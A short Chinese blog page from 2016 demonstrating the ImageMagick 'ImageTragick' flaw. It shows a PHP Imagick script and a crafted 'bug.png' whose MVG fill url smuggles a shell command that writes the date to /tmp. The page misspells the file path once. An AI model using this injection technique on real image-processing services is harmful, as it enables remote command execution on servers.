您的位置:首页 > 其它

Imagetrick 漏洞的实例

2016-05-06 11:56 453 查看
t1.php

<?php
ini_set('display_errors',true);
error_reporting(E_ALL);
$a++;
$src_img = new Imagick('bug.png');
$icon = new Imagick();
$icon->setFormat('ico');
$icon->addImage($src_img);
$icon->writeImages("favicon.ico", true);

$src_img->destroy();
$icon->destroy();


bug.png

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|date>/tmp/imbug.txt|echo ")'
pop graphic-context


执行

php t1.php

然后cat /tmp/umbug.txt里面会是当前的日期。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: